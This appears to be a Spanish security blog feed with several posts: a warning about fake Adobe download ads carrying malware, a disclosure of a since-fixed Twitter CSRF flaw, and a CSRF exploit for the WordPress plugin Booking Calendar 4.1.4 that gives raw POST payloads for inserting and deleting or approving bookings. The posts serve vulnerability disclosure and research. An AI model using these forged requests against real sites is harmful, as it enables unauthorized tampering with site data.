Gran parte de personas que navegan por internet hoy en día, más de una vez han tenido experiencias con virus/malwares, y actualmente se conocen muchas técnicas que utilizan estos malware para ejecutarse en su computadora y ahora usan campañas en búsquedas para hacerse en estas.

Hoy que iba navegando en la internet vi un curioso anuncio en la búsqueda de Google al buscar palabras como “Adobe Photoshop” o “Adobe Dreamveaver”, “adobe illustrator”, etc… Y  toda la colección de Adobe, son software bastante utilizados y conocidos, que actualmente cuentan con millones de descargas diarias, la cual ahora los ciberdelincuentes usan para “engañar” a las ingenuas víctimas que esperan descargar de manera gratuita algún software de la familia de Adobe.

(Error de ortografía en la MetaDescripcion; da que pensar que esto no va andar nada bien)

Donde al abrir la publicidad no sale un portal como este:

Decidí descargarlo y analizar el .exe con Virustotal y efectivamente:

Bueno, Google debería revisar la política a los anunciantes, estuve investigando al respecto y lo que resta aquí es denunciar la publicidad engañosa que de seguro caerá más de un “ingenuo” en la red.

Ya denuncie este tipo de anuncio, pero tan sólo hay que denunciar más y así la eliminaran más rápido, ya saben lo que dicen: “pueblo unido… reporte exitoso”
Y una buena advertencia a todos aquellos que descargan software de adobe…

¡Feliz Noche!

The post Ahora los Malwares Tienen Campaña de Adwords! appeared first on WebSecurityDev.

El dia de ayer a al las 3:40 pm encontre un CSRF en Twitter ,la cual mas tarde me di cuenta que aplicaba a todo. este CSRF  Permitia que a partir de un link enviado de una cuenta atacante a una cuenta victima fuece hackeada !

realize multiples pruebas y todas salieron positivas , logre grabar un video y al final lo podra vizualizar.

Lo que me sorprendio fue que a las 10 am  de la mañana  (Hora Colombiana ) de dia de hoy  ( 04/09/13 ). Al seguir buscando vulnerabilidades en Twitter esta misma vulnerabilidad de CRSF Aplicaba para todo! , realize multiples PoC, en una logre “trinar”, en otra retweetear, en otra cambie el nombre del perfil, en otra la descripcion, todo esto con un simple archivo de html.

Como llege hasta la vulnerabilidad? estaba leyendo un articulo de mecanismo de doble autentificacion con tu numero de celular decidi intentarlo y mirar las cabezeras y probe eliminando token de seguridad que este tenia y wala! funciono.!

Esta vulnerabilidad consistia en que aun sin tener el token de seguridad valido , la operacion que se estaba solicitando se realizaba. en pocas palabras el token que tenia antes no funcionaba! estaba de lujo. por que esta aunque la borrase de la peticion, la peticion se ejecutaba.

Empezemos con el Reporte.

Titulo: CSRF En Twitter.com

Acerca del Autor: Dylan Irzi – Juan David Castro Cantillo. – Colombiano.

Independent Security Researcher de 17 años de edad, Con Hall Of Fame Owncloud, Microsoft / Adobe .
De la Ciudad de Barranquilla.

A Quien Afectaban: A Todos los usuarios.

Estatus de la Vulnerabilidad: Fixed!

Video de Prueba de Concepto:

Bueno depues de eso a las 4 de la tarde hora colombiana, se puso en modo mantemiento para reparar supongo que la vulnerabilidad.

Correo de Confirmacion y reparacion de vulnerabilidad.

Eso ha sido todo el informe. la verdad ahora solo queda esperar que me coloquen en Hall Of Fame De  Twitter por WhiteHat. que segun el mail sera en unos dias.

Por Ultimo Agradecer a @SeguridadBlanca, @SrtadeDylan, @Armand0A , @Maldonad_Jeison, Por ayudarme Probar las PoC.
al Equipo de WebSecurityDev, y a Dios.

——————————————–

Att: Dylan Irzi

Independent Security Researche.

Happy Hacking!

The post Hackeando el Twitter Con Un Click. appeared first on WebSecurityDev.

The post CSRFTester En Accion… appeared first on WebSecurityDev.

Eh estado en las ultimas semana reportando fallos de Cross site scripting y se me ha olvidado mi antiguo laboratorio, Localhost. Pero hasta la semana pasada que tome el tiempo de fincho ( fin de semana ) para volver a usar plugins y buscar vulneabilidades como en viejos tiempos…

entonces revisando nuevos plugins en WordPress encontre un plugins de calendario. Booking Calendar 4.1.4, Y al hacer el proseso de prueba me dio buenos resultados.

Este plugin Trabaja con ajax, pero no maneja “token” lo cual eh alli el grave error, permitiendo asi Que modificando las cabezeras y enviando contenido por POST, sea capaz de realizar modificaciones a la base de datos. esta maneja una tabla especialmente para ella. “wp_booking ”

Ese dia. no puede haber nada mejor ” Firefox , Live HTTP Header, Firebug y tu Mente para realizar todo las pruebas con ese plugin”

El resultado : Cross-Site Request Forgery For POST.

Ahora que recuerdo NO Intente si era vulnerable a POST SQLi Injeccion, :/ Creo que ese dia ya estaba full cansado en la noche para seguir en la prueba. igual si alguien os desea puede seguir mi y completar la labor con ese plugin.

En resumen aqui les dejo el Video!

A continuacion el primer codigo del exploit. para añadir un evento al calendario.

———————————————————–
ajax_action=INSERT_INTO_TABLE&bktype=1&dates=(DATE)&form=text%5Ename1%5Etest~text%5Esecondname1%5Etest~email

%5Eemail1%5test%40gmail.com~text%5Ephone1%5Etest~textarea

%5Edetails1%5Etest&captcha_chalange=&captcha_user_input=&is_send_emeils=1&my_booking_hash=&booking_form_type=&wpdev

_active_locale=es_ES[/code] [code]Delete:
Url: http://localhost/wordpress/wp-content/plugins/booking/wpdev-booking.php

Post:
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; rv:22.0) Gecko/20100101 Firefox/22.0 AlexaToolbar/alxf-2.18
Accept: */*
Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: http://localhost/wordpress/wp-admin/admin.php?page=booking/wpdev-booking.phpwpdev-

booking&wh_booking_id=4&view_mode=vm_listing&tab=actions
Content-Length: 104
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

—————————

ajax_action=DELETE_APPROVE&booking_id=4&is_send_emeils=1&denyreason=&user_id=1&wpdev_active_locale=es_ES

———————————————————[/code]

The post CSRF Plugin Booking Calendar 4.1.4 – WordPress appeared first on WebSecurityDev.

https://websecuritydev.com/

By Dylan Irzi

The post XSS Reflected En Flattr. appeared first on WebSecurityDev.

El Exploit esta actualmente Funcionando. Espero que disfruten y ahora Tenemos Canal de Youtube!

The post Exploit WordPress – CP Reservation Calendar 1.01 CSRF y XSS Persistent. appeared first on WebSecurityDev.